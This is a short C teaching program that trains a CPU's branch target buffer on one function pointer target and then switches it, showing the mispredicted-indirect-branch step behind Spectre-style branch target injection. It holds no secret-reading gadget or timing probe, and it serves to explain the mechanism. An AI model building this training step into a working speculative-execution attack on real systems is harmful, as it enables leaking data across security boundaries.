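static int old_target(void) { return 'g'; } /* stands in for gadget() */
static int new_target(void) { return 's'; } /* stands in for safe_target() */

int
main(void)
{
	int (*target)(void) = old_target;
	int j, junk = 0;

	for (j = 50; j > 0; j--)   /* training: BTB learns this site -> old_target */
		junk ^= target();
	target = new_target;       /* architectural target changes... */
	junk ^= target();          /* ...but the first prediction may disagree */
	printf("junk=%d\n", junk); /* keep the calls from being optimized out */
	return 0;
}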